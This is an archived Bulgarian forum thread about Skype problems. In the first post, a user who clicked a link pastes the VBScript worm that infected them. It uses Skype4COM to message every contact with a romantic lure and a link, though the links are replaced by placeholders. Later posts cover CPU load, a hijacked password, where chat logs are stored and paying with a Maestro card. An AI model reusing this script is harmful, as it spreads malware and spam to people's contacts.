Jump to content
BulForum.com

Skype-ползвате ли го?


alchemy

Recommended Posts

Без да исках отворих 1 линк..и май се заразих..

 

on error resume next

set NrrlP = WScript.CreateObject("Scripting.FileSystemObject")

set uDlVA = wscript.createobject("wscript.shell")

set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")

yADAl.Client.Start()

yADAl.Attach()

For Each GAG In yADAl.Friends

yADAl.SendMessage GAG.handle,"Искам да ти призная , че те обичам много ... Просто ме беше срам да ти го кажа преди това (blush) Поздравче за теб миличко : [some URL Here] :* "

next

msgbox "bY GENCHO411 ( some URL here)"

 

Мисля си, че сега праща съобщения без да съм ги писал аз..

как да го оправя???

Link to comment
Share on other sites

  • Replies 1.5k
  • Created
  • Last Reply
Айде няма нужда линковете да остават, нали? Има серсеми дето ще щракнат на тях...

Не се осетих .. извинявам се.

 

@*lola* аз ли ти го пратих :O

Link to comment
Share on other sites

Без да исках отворих 1 линк..и май се заразих..

Мисля си, че сега праща съобщения без да съм ги писал аз..

как да го оправя???

preinstall na windowsa :lol: qvno nqmash Oset koe da natiskash i koe ne

Link to comment
Share on other sites

Волейболист №1 на Европа за 2006 г. Матей Казийски не скри емоциите си при своето представянето в Итас Диатек (Тренто). Юношата на Славия бе показан на феновете и журналистите чрез видеовръзка по Skype от Франция.

тоя скайп много популярен :D

Link to comment
Share on other sites

Бахти имам следния проблем. Свалих си последната версия на скайп и ми ползва 99% от процесора и не мога нищо да правя. Нямам такъв проблем с една по-стара версия с която бях до сега. Някой има ли същия проблем? Моля въздържайте се от мнения сложи си едикоя си програма която е по-добра от скайп и т.н.

 

CPU: 2.4ghz Celeron

Ram: 512 mb

 

...

Link to comment
Share on other sites

Бахти имам следния проблем. Свалих си последната версия на скайп и ми ползва 99% от процесора и не мога нищо да правя. Нямам такъв проблем с една по-стара версия с която бях до сега. Някой има ли същия проблем? Моля въздържайте се от мнения сложи си едикоя си програма която е по-добра от скайп и т.н.

един приятел го имаше същия проблем, свали си някоя по-стара версия ;)

Link to comment
Share on other sites

един приятел го имаше същия проблем, свали си някоя по-стара версия ;)

 

Е само така ли се оправя? До сега си бях със старата версия и бях пушка ама не мога да разбера какъв е този проблем. Не може да е неразрешим.

Link to comment
Share on other sites

  • 4 weeks later...

Днес ми се получи следният проблем. Сутринта ставам и гледам излезнал съм от скайп, и някакво съобщение, в което се пишеше, че паролата ми е сменена (не от мен!), а от скайп и заради сигурност... ? Отидох в сайт-а им и password remider обаче не съм бил дал и-мейл, писах на support-a им обаче не ми отговориха.. някакви идеи и на някой друг случвало ли му се е ?

Link to comment
Share on other sites

Еми в такъв случай се налага да направиш нов скайп акаунт :)
Е те бяха така любезни да ми кажат дори как да си направя нов...
Link to comment
Share on other sites

Не ми се вярва Скайп да ти сменят паролата от съображение за сигурност и още по-вече без да са те предупредили.Мога да допусна, че някой твой приятел/ка я е научкал/а и я е сменил/а или си я давал на някого, но сега да не помниш.Ти казваш, че не си им оставил е-майл, на който да те известяват за проблеми и при забравена парола да ти изпращат нова.

Моят съвет е:

Първо: Направи си електронна поща.

Второ: Направи си нов Скайп акаунт и остави е-майл адреса за връзка.

Трето: Напиши си сложна парола и си е запиши в някое тефтерче.По възможност е запомни :)

 

П.С. Казвам сложна, защото ако някой ти я сменил, сега да не може ;)

Link to comment
Share on other sites

Е това за и-мейла го направих спокойно :). Паролата я направих уж по-сложна, обаче ме съмнява, че приятел я е сменил... пишеше от сигурност :wacko:

Link to comment
Share on other sites

Ммм. приятел - хакер, виж възможно е.Не съм 100 % сигурен, но може да се допуска :) има си разни троянски разпределители или там както се водят несъм много запознат с тези неща.Може пък и да има нещо от самия Скайп, но да ти кажа за пръв път го чувам този проблем.

 

П.С. Айде и весело :punk

Link to comment
Share on other sites

случаино да си пускал фаилове с разширение *.vbs които да искат да използват скаип и да си им разрешил ?

Link to comment
Share on other sites

Абе може ли да ми кажете къде се сейфат логовете на Skype? :unsure:
Ако приемем, че системния ти диск е C: и влизаш в Windows с име "Потребител1" а в Skype с име "Потребител2", то чат историята се пази в C:\Documents and Settings\Потребител1\Application Data\Skype\Потребител2\chatsync. Но не може да се разгледа директно. При заявка за показване на хронологията на чата с някой абонат от листата (например "КонтактХ"), Skype генерира и отваря в браузъра файл КонтактХ.html в папката C:\Documents and Settings\Потребител1\Application Data\Skype\Потребител2\IMHistory. Когато го затвориш, файлът се изтрива оттам.
Link to comment
Share on other sites

А някой да знае дали могат да се закупят кредити на скайп със дебитна карта?

Сега пробвах да го направя, но на картата ми пише че е Maestro, а такава в списъка няма.

Link to comment
Share on other sites

А някой да знае дали могат да се закупят кредити на скайп със дебитна карта?

Сега пробвах да го направя, но на картата ми пише че е Maestro, а такава в списъка няма.

Ако не става с картата пробвай да си регистрираш account в Moneybookers. Ако там също можеш да превеждаш пари в Skype.

Link to comment
Share on other sites

Ако не става с картата пробвай да си регистрираш account в Moneybookers. Ако там също можеш да превеждаш пари в Skype.
То точно от там се пробвам, но в списъка ми няма Maestro, а би трябвало да става. Ако ще е от полза, дебитната ми карта е към unicredit bulbank.

Пробвах да се регистрирам с Mastercard, обаче ми изкара надпис да въведа валиден номер на картата

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.


×
×
  • Create New...